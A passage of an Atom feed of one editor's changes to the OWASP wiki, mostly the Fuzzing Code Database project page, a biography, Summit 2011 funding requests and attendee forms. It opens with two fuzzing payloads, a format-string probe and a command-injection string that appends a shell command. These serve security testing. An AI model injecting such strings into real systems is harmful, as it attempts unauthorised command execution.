\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:Ulisses_Castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Wagner.elias&amp;diff=100987</id>
		<title>User:Wagner.elias</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Wagner.elias&amp;diff=100987"/>
				<updated>2011-01-19T13:44:39Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;* Wagner Elias's [mailto:wagner.elias@owasp.org mail contact] and [[:Special:Contributions/Wagner.elias|wiki contributions]].&lt;br /&gt;
&lt;br /&gt;
Wagner Elias works with Information Security since 2004, worked as a consultant, team leader and manager of consulting.&lt;br /&gt;
Has extensive experience in conducting projects with in Application Security and deployed solutions in companies of several segments.&lt;br /&gt;
&lt;br /&gt;
It has the certifications CBCP, SANS GIAC GHTQ, ITIL and CobiT Foundations, beyond certification of products SIEM and WAF. He is the founder of the Brazilian chapter of OWASP and currently leads the Sao Paulo chapter. He served as director of Education and Content management in 2006-2008 and Event management 2008-2010 of the Brazilian chapter of ISSA. He is co-founder and CTO of Conviso Application Security, where serves as Manager of R &amp;amp; D, responsible for managing research and development project consulting.&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Wagner.elias&amp;diff=100986</id>
		<title>User:Wagner.elias</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Wagner.elias&amp;diff=100986"/>
				<updated>2011-01-19T13:44:03Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;* Wagner Elias's [mailto:wagner.elias@owasp.org mail contact] and [[:Special:Contributions/Wagner.elias|wiki contributions]].&lt;br /&gt;
&lt;br /&gt;
* Wagner Elias works with Information Security since 2004, worked as a consultant, team leader and manager of consulting.&lt;br /&gt;
Has extensive experience in conducting projects with in Application Security and deployed solutions in companies of several segments.&lt;br /&gt;
&lt;br /&gt;
It has the certifications CBCP, SANS GIAC GHTQ, ITIL and CobiT Foundations, beyond certification of products SIEM and WAF. He is the founder of the Brazilian chapter of OWASP and currently leads the Sao Paulo chapter. He served as director of Education and Content management in 2006-2008 and Event management 2008-2010 of the Brazilian chapter of ISSA. He is co-founder and CTO of Conviso Application Security, where serves as Manager of R &amp;amp; D, responsible for managing research and development project consulting.&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:Brasil&amp;diff=100837</id>
		<title>Category:Brasil</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:Brasil&amp;diff=100837"/>
				<updated>2011-01-18T13:37:00Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: /* Documentos Publicados em Português (Portuguese Language Documents) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This [[:Special:Categories|category]] is meant to contain all [[:Category:OWASP Chapter|OWASP Chapters]] in Brasil.&lt;br /&gt;
&lt;br /&gt;
===Documentos Publicados em Português (Portuguese Language Documents)===&lt;br /&gt;
&lt;br /&gt;
* [http://code.google.com/p/webgoat-ptbr/downloads/list WebGoat em PT-BR]&lt;br /&gt;
* [http://www.owasp.org/images/4/42/OWASP_TOP_10_2007_PT-BR.pdf OWASP Top Ten 2007]&lt;br /&gt;
* [http://www.owasp.org/images/b/b4/OWASP-Intro-2008-pt-br.ppt Introdução ao OWASP]&lt;br /&gt;
* [http://www.owasp.org/images/7/75/OWASP_TOP10_PT-BR.ppt Apresentação do Top Ten 2007 (PPT)]&lt;br /&gt;
* [http://www.owasp.org/images/d/d8/OWASP_SCP_Quick_Reference_PT-BR_v1.1.pdf Secure Coding Guide - Quick Reference Guide]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Chapter]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:OWASP_SCP_Quick_Reference_PT-BR_v1.1.pdf&amp;diff=100836</id>
		<title>File:OWASP SCP Quick Reference PT-BR v1.1.pdf</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:OWASP_SCP_Quick_Reference_PT-BR_v1.1.pdf&amp;diff=100836"/>
				<updated>2011-01-18T13:36:19Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Summit_2011/Funding/Wagner_Elias&amp;diff=100782</id>
		<title>Summit 2011/Funding/Wagner Elias</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Summit_2011/Funding/Wagner_Elias&amp;diff=100782"/>
				<updated>2011-01-17T17:05:20Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Summit_2011_Funding |&lt;br /&gt;
| Personal_Request_By= Wagner Elias (São Paulo Chapter Leader and OWASP Fuzzing Code Database leader project)&lt;br /&gt;
| Personal_Request_Text = &amp;lt;!-- PUT THE REQUEST TEXT BELOW--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
I met the project in 2006, then studying secure development and guides were essential. In The Same year founded the Brazil chapter, Which was recently split into regional chapters (Sao Paulo, Brasilia, Porto Alegre, Curitiba and Campinas). I lead the Sao Paulo chapter. Currently I Constantly working with the resources and collaborate with OWASP disseminating the initiative in Brazil and working with projects like OWASP Fuzzing Code Database; ESAP Swingset and Participating in the organization AppSec Brazil.&lt;br /&gt;
&lt;br /&gt;
I attended the Summit in 2008 and hope to Participate in this because it is a great Opportunity to exchange information with the best professionals and the OWASP grow.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- END OF PERSONAL REQUEST--&amp;gt;&lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Summit_2011/Funding/Wagner_Elias&amp;diff=100781</id>
		<title>Summit 2011/Funding/Wagner Elias</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Summit_2011/Funding/Wagner_Elias&amp;diff=100781"/>
				<updated>2011-01-17T17:04:45Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Summit_2011_Funding |&lt;br /&gt;
| Personal_Request_By= An appeal from Wagner Elias (São Paulo Chapter Leader and OWASP Fuzzing Code Database leader project)&lt;br /&gt;
| Personal_Request_Text = &amp;lt;!-- PUT THE REQUEST TEXT BELOW--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
I met the project in 2006, then studying secure development and guides were essential. In The Same year founded the Brazil chapter, Which was recently split into regional chapters (Sao Paulo, Brasilia, Porto Alegre, Curitiba and Campinas). I lead the Sao Paulo chapter. Currently I Constantly working with the resources and collaborate with OWASP disseminating the initiative in Brazil and working with projects like OWASP Fuzzing Code Database; ESAP Swingset and Participating in the organization AppSec Brazil.&lt;br /&gt;
&lt;br /&gt;
I attended the Summit in 2008 and hope to Participate in this because it is a great Opportunity to exchange information with the best professionals and the OWASP grow.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- END OF PERSONAL REQUEST--&amp;gt;&lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Summit_2011/Funding/Wagner_Elias&amp;diff=100780</id>
		<title>Summit 2011/Funding/Wagner Elias</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Summit_2011/Funding/Wagner_Elias&amp;diff=100780"/>
				<updated>2011-01-17T17:00:48Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: Created page with '{{Summit_2011_Funding | | Personal_Request_By= OWASP Leader | Personal_Request_Text = &amp;lt;!-- PUT THE REQUEST TEXT BELOW--&amp;gt;  I met the project in 2006, then studying secure developm…'&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Summit_2011_Funding |&lt;br /&gt;
| Personal_Request_By= OWASP Leader&lt;br /&gt;
| Personal_Request_Text = &amp;lt;!-- PUT THE REQUEST TEXT BELOW--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
I met the project in 2006, then studying secure development and guides were essential. In The Same year founded the Brazil chapter, Which was recently split into regional chapters (Sao Paulo, Brasilia, Porto Alegre, Curitiba and Campinas). I lead the Sao Paulo chapter. Currently I Constantly working with the resources and collaborate with OWASP disseminating the initiative in Brazil and working with projects like OWASP Fuzzing Code Database; ESAP Swingset and Participating in the organization AppSec Brazil.&lt;br /&gt;
&lt;br /&gt;
I attended the Summit in 2008 and hope to Participate in this because it is a great Opportunity to exchange information with the best professionals and the OWASP grow.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- END OF PERSONAL REQUEST--&amp;gt;&lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Summit_2011_Attendee/Attendee126&amp;diff=100447</id>
		<title>Summit 2011 Attendee/Attendee126</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Summit_2011_Attendee/Attendee126&amp;diff=100447"/>
				<updated>2011-01-14T13:09:35Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:&amp;lt;includeonly&amp;gt;{{{1}}}&amp;lt;/includeonly&amp;gt;&amp;lt;noinclude&amp;gt;OWASP 2011 Global Summit Attendee Tab&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_name1 = Wagner Elias&lt;br /&gt;
| summit_attendee_email1 = wagner.elias@owasp.org&lt;br /&gt;
| summit_attendee_wiki_username1 = wagner.elias&lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_company = Conviso Application Security&lt;br /&gt;
|-&lt;br /&gt;
| Project Leadership (less than 6 months old) =  &lt;br /&gt;
| Project Leadership (more than 6 months old) = Founder and leader of Chapter Brazil until 2010 and currently leader of the São Paulo Chapter&lt;br /&gt;
| Release Leadership (less than 6 months old) = &lt;br /&gt;
| Release Leadership (more than 6 months old) = &lt;br /&gt;
| Project Contribution  (less than 6 months old) = &lt;br /&gt;
| Project Contribution  (more than 6 months old) = &lt;br /&gt;
| Release Contribution (less than 6 months old) =  &lt;br /&gt;
| Release Contribution (more than 6 months old) = &lt;br /&gt;
| Committee Membership = &lt;br /&gt;
| Chapter Co-Leadership = &lt;br /&gt;
| Conference Co-Leadership = OWASP AppSec Brazil &lt;br /&gt;
| Projected Funding Cost = &lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_current_owasp_involvement_name1 =  &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_1 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_name2 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_2 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_name3 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_3 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_name4 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_4 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_name5 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_5 = &lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name1 = Secure Coding Workshop Track&lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_1 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_1 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name2 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_2 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_2 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name3 = O2 Platform&lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_3 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_3 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name4 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_4 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_4 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name5 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_5 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_5 = &lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_owasp_sponsor = &lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_summit_time_paid_by_name1 = Conviso Application Security&lt;br /&gt;
| summit_attendee_summit_time_paid_by_url_1 = http://www.conviso.com.br&lt;br /&gt;
| summit_attendee_summit_time_paid_by_name2 =&lt;br /&gt;
| summit_attendee_summit_time_paid_by_url_2 =&lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_summit_expenses_paid_by_name1 = &lt;br /&gt;
| summit_attendee_summit_expenses_paid_by_url_1 = &lt;br /&gt;
| summit_attendee_summit_expenses_paid_by_name2 = &lt;br /&gt;
| summit_attendee_summit_expenses_paid_by_url_2 =  &lt;br /&gt;
|-&lt;br /&gt;
| reason_for_sponsorship = Working together with volunteers to develop the OWASP and spread the work in Brazil&lt;br /&gt;
|-&lt;br /&gt;
| status = requesting fundings&lt;br /&gt;
|-&lt;br /&gt;
| letter sent to sponsor = &lt;br /&gt;
|-&lt;br /&gt;
| notes for Kate =   &lt;br /&gt;
|-&lt;br /&gt;
| attendee_name_mask = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Attendee126&lt;br /&gt;
| attendee_home_page = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Summit_2011_Attendee/Attendee126&lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Summit_2011_Attendee/Attendee126&amp;diff=100446</id>
		<title>Summit 2011 Attendee/Attendee126</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Summit_2011_Attendee/Attendee126&amp;diff=100446"/>
				<updated>2011-01-14T13:09:08Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;http://pt.wikipedia.org/wiki/Postback 3 http://www.owasp.org/index.php/Double_Encoding&lt;br /&gt;
&lt;br /&gt;
Desabilitar o cache realizado no lado cliente das páginas que contenham informações sensíveis. O parâmetro Cache-Control: no-store, pode ser usado em conjunto com o controle definido no cabeçalhos HTTP “Pragma: no-cache”, que é menos efetivo, mas é compatível com HTTP/1.0.&lt;br /&gt;
&lt;br /&gt;
Verificar os valores de cabeçalho, tanto das requisições, como das respostas, que contém apenas caracteres ACII.&lt;br /&gt;
&lt;br /&gt;
Verificar bytes nulos (00%).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Template:&amp;lt;includeonly&amp;gt;{{{1}}}&amp;lt;/includeonly&amp;gt;&amp;lt;noinclude&amp;gt;OWASP 2011 Global Summit Attendee Tab&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_name1 = Wagner Elias&lt;br /&gt;
| summit_attendee_email1 = wagner.elias@owasp.org&lt;br /&gt;
| summit_attendee_wiki_username1 = wagner.elias&lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_company = Conviso Application Security&lt;br /&gt;
|-&lt;br /&gt;
| Project Leadership (less than 6 months old) =  &lt;br /&gt;
| Project Leadership (more than 6 months old) = Founder and leader of Chapter Brazil until 2010 and currently leader of the São Paulo Chapter&lt;br /&gt;
| Release Leadership (less than 6 months old) = &lt;br /&gt;
| Release Leadership (more than 6 months old) = &lt;br /&gt;
| Project Contribution  (less than 6 months old) = &lt;br /&gt;
| Project Contribution  (more than 6 months old) = &lt;br /&gt;
| Release Contribution (less than 6 months old) =  &lt;br /&gt;
| Release Contribution (more than 6 months old) = &lt;br /&gt;
| Committee Membership = &lt;br /&gt;
| Chapter Co-Leadership = &lt;br /&gt;
| Conference Co-Leadership = OWASP AppSec Brazil &lt;br /&gt;
| Projected Funding Cost = &lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_current_owasp_involvement_name1 =  &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_1 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_name2 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_2 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_name3 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_3 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_name4 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_4 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_name5 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_5 = &lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name1 = Secure Coding Workshop Track&lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_1 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_1 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name2 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_2 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_2 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name3 = O2 Platform&lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_3 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_3 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name4 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_4 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_4 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name5 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_5 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_5 = &lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_owasp_sponsor = &lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_summit_time_paid_by_name1 = Conviso Application Security&lt;br /&gt;
| summit_attendee_summit_time_paid_by_url_1 = http://www.conviso.com.br&lt;br /&gt;
| summit_attendee_summit_time_paid_by_name2 =&lt;br /&gt;
| summit_attendee_summit_time_paid_by_url_2 =&lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_summit_expenses_paid_by_name1 = &lt;br /&gt;
| summit_attendee_summit_expenses_paid_by_url_1 = &lt;br /&gt;
| summit_attendee_summit_expenses_paid_by_name2 = &lt;br /&gt;
| summit_attendee_summit_expenses_paid_by_url_2 =  &lt;br /&gt;
|-&lt;br /&gt;
| reason_for_sponsorship = Working together with volunteers to develop the OWASP and spread the work in Brazil&lt;br /&gt;
|-&lt;br /&gt;
| status = requesting fundings&lt;br /&gt;
|-&lt;br /&gt;
| letter sent to sponsor = &lt;br /&gt;
|-&lt;br /&gt;
| notes for Kate =   &lt;br /&gt;
|-&lt;br /&gt;
| attendee_name_mask = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Attendee126&lt;br /&gt;
| attendee_home_page = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Summit_2011_Attendee/Attendee126&lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Summit_2011_Attendee/Attendee126&amp;diff=100445</id>
		<title>Summit 2011 Attendee/Attendee126</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Summit_2011_Attendee/Attendee126&amp;diff=100445"/>
				<updated>2011-01-14T13:07:57Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;http://pt.wikipedia.org/wiki/Postback 3 http://www.owasp.org/index.php/Double_Encoding&lt;br /&gt;
&lt;br /&gt;
Desabilitar o cache realizado no lado cliente das páginas que contenham informações sensíveis. O parâmetro Cache-Control: no-store, pode ser usado em conjunto com o controle definido no cabeçalhos HTTP “Pragma: no-cache”, que é menos efetivo, mas é compatível com HTTP/1.0.&lt;br /&gt;
&lt;br /&gt;
Verificar os valores de cabeçalho, tanto das requisições, como das respostas, que contém apenas caracteres ACII.&lt;br /&gt;
&lt;br /&gt;
Verificar bytes nulos (00%).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Template:&amp;lt;includeonly&amp;gt;{{{1}}}&amp;lt;/includeonly&amp;gt;&amp;lt;noinclude&amp;gt;OWASP 2011 Global Summit Attendee Tab&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_name1 = Wagner Elias&lt;br /&gt;
| summit_attendee_email1 = wagner.elias@owasp.org&lt;br /&gt;
| summit_attendee_wiki_username1 = wagner.elias&lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_company = Cigital&lt;br /&gt;
|-&lt;br /&gt;
| Project Leadership (less than 6 months old) =  &lt;br /&gt;
| Project Leadership (more than 6 months old) = Founder and leader of Chapter Brazil until 2010 and currently leader of the São Paulo Chapter&lt;br /&gt;
| Release Leadership (less than 6 months old) = &lt;br /&gt;
| Release Leadership (more than 6 months old) = &lt;br /&gt;
| Project Contribution  (less than 6 months old) = &lt;br /&gt;
| Project Contribution  (more than 6 months old) = &lt;br /&gt;
| Release Contribution (less than 6 months old) =  &lt;br /&gt;
| Release Contribution (more than 6 months old) = &lt;br /&gt;
| Committee Membership = &lt;br /&gt;
| Chapter Co-Leadership = &lt;br /&gt;
| Conference Co-Leadership = OWASP AppSec Brazil &lt;br /&gt;
| Projected Funding Cost = &lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_current_owasp_involvement_name1 =  &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_1 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_name2 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_2 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_name3 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_3 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_name4 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_4 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_name5 = &lt;br /&gt;
| summit_attendee_current_owasp_involvement_url_5 = &lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name1 = Secure Coding Workshop Track&lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_1 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_1 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name2 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_2 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_2 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name3 = O2 Platform&lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_3 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_3 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name4 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_4 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_4 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_name5 = &lt;br /&gt;
| summit_attendee_reason_for_summit_participation_url_5 = &lt;br /&gt;
| notes_reason_for_participating_issues_to_be_discussed_5 = &lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_owasp_sponsor = &lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_summit_time_paid_by_name1 = Conviso Application Security&lt;br /&gt;
| summit_attendee_summit_time_paid_by_url_1 = http://www.conviso.com.br&lt;br /&gt;
| summit_attendee_summit_time_paid_by_name2 =&lt;br /&gt;
| summit_attendee_summit_time_paid_by_url_2 =&lt;br /&gt;
|-&lt;br /&gt;
| summit_attendee_summit_expenses_paid_by_name1 = &lt;br /&gt;
| summit_attendee_summit_expenses_paid_by_url_1 = &lt;br /&gt;
| summit_attendee_summit_expenses_paid_by_name2 = &lt;br /&gt;
| summit_attendee_summit_expenses_paid_by_url_2 =  &lt;br /&gt;
|-&lt;br /&gt;
